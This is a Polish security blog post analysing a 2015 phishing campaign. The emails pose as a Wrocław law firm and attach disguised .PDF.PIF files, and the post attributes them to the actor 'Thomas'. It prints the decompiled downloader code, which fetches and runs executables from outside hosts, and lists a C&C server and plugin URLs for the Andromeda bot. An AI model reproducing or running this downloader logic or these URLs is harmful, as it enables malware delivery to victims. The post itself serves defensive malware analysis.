Kampania ze sprawą karną – czyżby Thomas pozazdrościł sukcesów kolegom?

dodał 14 września 2015 o 22:42 w kategorii Złośniki  z tagami:
Kampania ze sprawą karną – czyżby Thomas pozazdrościł sukcesów kolegom?

Trudno nam dzisiaj oderwać się od analizy złośliwego oprogramowania – w nasze ręce właśnie trafiła próbka kolejnej kampanii, której ofiarami mogło już paść ponad 100 internautów i za którą może stać legendarny Thomas.

Zanim naszą skrzynkę zasypały doniesienia o atakach fiat126pteam dość długo zajmowaliśmy się różnymi kampaniami niejakiego Thomasa (z takiej nazwy użytkownika Windows korzystał). Znajdziecie u nas historię jego wyczynów (samorządy,  Chomikuj, wezwania do zapłaty, atak na naszych Czytelników, garść innych pomysłów), a poniżej opis kolejnej próby ataku noszącej znamiona jego autorstwa.

Atak w starym stylu

Atak zaczyna się od wiadomości poczty elektronicznej przesłanej rzekomo przez adwokat z Wrocławia. Przestępca ukradł tożsamość istniejącej kancelarii adwokackiej, używając jej logo i danych kontaktowych. Temat brzmi Powiadomienie o przekazaniu sprawy karnej do Sadu Rejonowego we Wroclawiu a w załączniku do wiadomości znajduje się plik

Powiadomienie o Przekazaniu Sprawy Karnej do Sadu Rejonowego z dnia 14_09_2015.zip

Wiadomość od oszusta

Wiadomość od oszusta

Załączony plik ZIP zawiera plik o identycznej nazwie, lecz rozszerzeniu .PDF.PIF. Powoduje to, że nawet przy włączonym pokazywaniu znanych rozszerzeń plików Explorator Windows pokaże wyłącznie rozszerzenie PDF (choć ikona będzie pokazywać plik PIF).

Drugi wariant wiadomości wysyłany 15 września ma temat Zawiadomienie o rozpoczęciu sprawy karnej w Sądzie okręgowym w Lublinie 15/09/2015‏

Drugi wariant wiadomości

Drugi wariant wiadomości

oraz załącznik w archiwum RAR z hasłem

Zawiadomienie o rozpoczęciu Sprawy Karnej dnia 15_09_2015.pdf.pif

Załączony plik pełni identyczną rolę jak w pierwszym wariancie.

Na drugi wariant zareagowała nawet Okręgowa Rada Adwokacka i wysłała taki komunikat:

From: Okręgowa Rada Adwokacka w Warszawie [mailto:mailing@ora.waw.pl] Sent: 15 września 2015 16:36
Subject: PILNY KOMUNIKAT oraz jubileuszowy Biuletyn Dziekana Izby Adwokackiej w Warszawie

 Z OSTATNIEJ CHWILI – UWAGA!

Dziś do nieokreślonego kręgu adresatów zostały rozesłane wiadomości z różnych rzekomych adresów e-mail, np.: przemyslaw.bujniak@adwokatura.pl bądź daniel.grodzinski@pgng.pl, zawierające najprawdopodobniej złośliwe oprogramowanie mogące uszkodzić Państwa komputer bądź spowodować nieodwracalne szkody w Państwa systemie.

Dla bezpieczeństwa Państwa komputera oraz danych w nim zgromadzonych rekomendujemy aby nie otwierać takich wiadomości,  w tym w szczególności załącznika.

Prosty downloader

Złośliwy plik o rozmiarze zaledwie 17KB wydaje się być tylko prostym pobieraczem kolejnego etapu ataku. Fragment kodu odpowiedzialny za realizację jego funkcji:

		private void Timer1_Tick(object sender, EventArgs e)
		{
			string randomFileName = Path.GetRandomFileName();
			string text = Path.Combine(MyProject.Computer.FileSystem.SpecialDirectories.Temp, randomFileName + ".exe");
			try
			{
				MyProject.Computer.Network.DownloadFile("http://wrzos.net/strona/gfx/dpwdpwd.exe", text);
				Process.Start(text);
				this.Timer1.Stop();
				this.Timer2.Start();
			}
			catch (Exception expr_5F)
			{
				ProjectData.SetProjectError(expr_5F);
				MyProject.Computer.Network.DownloadFile("http://updo.nl/file/2b272802.exe", text);
				Process.Start(text);
				this.Timer1.Stop();
				this.Timer2.Start();
				ProjectData.ClearProjectError();
			}
		}
		private void Timer2_Tick(object sender, EventArgs e)
		{
			this.WebBrowser1.Navigate("http://bit.ly/1K9nQ0T");
			this.Timer2.Stop();
		}

Najpierw próbuje pobrać plik ze strony wrzos.net. Gdy to się nie uda, szuka identycznego pliku na holenderskim hostingu updo.nl. Po pobraniu pliku odwiedza stronę bit.ly, gdzie wywołuje przekierowanie, służące zapewne do zliczania statystyk ataku (przekierowanie prowadzi do strony głównej serwisu Wykop.pl).

Plik zawiera także ścieżkę PDB:

C:\Users\Thomas\Documents\Visual Studio 2010\Projects\pobieracz\WindowsApplication1\WindowsApplication1\obj\x86\Release\WindowsApplication1.pdb

Wskazuje ona na nazwę projektu pobieracz.

Właściwy koń trojański

Plik pobierany przez pobieracza to prawdopodobnie klient botnetu Andromeda, posiadający funkcje rootkitu, proxy i możliwość przechwytywania i modyfikowania sesji bankowości elektronicznej. Podobno pojawił się w sieci ok. 2 tygodni temu. Sam złośliwy plik zapakowany jest w skrypty AutoIt.

Statystyki ataku

Użycie serwisu bit.ly pozwala na poznanie statystyk ataku. Nawet odliczając osoby takie jak my, które sprawdzają, jak działa ten program, wygląda na to, że dzisiaj od godziny 16 już ok. 200 osób dało się złapać na przynętę atakującego.

Statystyki ataku

Statystyki ataku

Możemy także zobaczyć, że znakomita większość zaatakowanych komputerów znajdowała się w Polsce.

Statystyki ataku

Statystyki ataku

Z kolei statystyki ataku z 15 września wyglądają następująco:

Statystyki ataku

Statystyki ataku

Dane złośliwych plików

Etap pierwszy – pobieracz:

Drugi wariant pobieracza:

Etap drugi – właściwy koń trojański:

  • pierwsza obserwacja: 2015-09-14 20:02
  • MD5: b6e5e51927a94d415c2f1268abc2bc67
  • SHA1: 71af57621f7c21c6f53f8b9292750620abfad3da
  • analiza VT (9/57)
  • analiza Hybrid Analysis i sam plik do pobrania
  • serwer C&C: http://ipko.co.vu
  • pliki z wtyczkami Andromedy: http://ipko.co.vu/wp-config/r.pack / s.pack / f.pack

Skąd wiadomo że to Thomas

W naszej ocenie albo ktoś bardzo Thomasa udaje, albo nim jest. Jeśli porównanie ten atak z innym opisanym przez nas atakiem z marca tego roku, to zobaczycie drobne podobieństwa:

  • wiadomość rzekomo od kancelarii,
  • w wiadomości logo kancelarii,
  • z załącznikiem PDF. ZIP,
  • w środku PDF.PIF,
  • w załączniku dropper,
  • dropper otwiera stronę testową do zliczania statystyk (w marcowym ataku zamiast Wykop.pl była z3s.pl),
  • pobiera plik z dwóch alternatywnych adresów,
  • jednym z nich jest updo.nl,
  • plik docelowy jest zapakowany w AutoIt,
  • serwer C&C znajduje się w serwerowni ProSerwer.pl gdzie za hosting można płacić SMSem.

Ta lista podobieństw chyba wystarcza.

Dziękujemy Czytelniczce, która podesłała próbki oraz anonimowemu analitykowi, który ekspresowo rozebrał malware.

Artykuł zaktualizowany 15 września o dane drugiego wariantu ataku.

Jeśli interesuje Was podniesienie świadomości pracowników w celu lepszej ochrony przed takimi atakami, to rzućcie okiem na usługę SecurityInside